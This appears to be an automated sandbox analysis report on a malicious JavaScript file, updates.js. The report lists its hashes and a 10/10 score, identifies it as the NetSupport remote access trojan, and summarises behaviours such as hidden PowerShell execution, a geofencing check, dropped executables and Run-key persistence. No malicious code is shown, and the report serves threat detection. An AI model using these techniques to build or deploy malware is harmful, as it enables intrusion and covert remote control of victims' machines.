Extracted

• • Target

    updates.js

  • Size

    7.3MB

  • MD5

    cbb64c3f4095d8fc567c2e3fc1295a67

  • SHA1

    a114622094d9563593cd3e571ffb2d7f67edd8c9

  • SHA256

    db302ab8343193ac2826bd9de5b168af740c6e6e6779149daec44efc0ac01b95

  • SHA512

    eda9bf2299253b5026a38f43bb5e5eaf1169332e9a3afb699928c059713952f2604c442476f31e5f98a8f67073948e0e0697591ade88c2999ff0b0c3d0e35fd9

  • SSDEEP

    49152:e7h4zjCxb7qHlp4XONN0G7h20kQmwYzYMm7u+8wgJ3wr/xN1GIWx3qpWROg2cE08:7

  Score

  10^/10

  executionnetsupportpersistencerat

  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

    ratnetsupport

  • Blocklisted process makes network request

  • Command and Scripting Interpreter: PowerShell

    Run Powershell and hide display window.

    execution

  • Checks computer location settings

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE

  • Loads dropped DLL

  • Adds Run key to start application

    persistence
  behavioral1behavioral2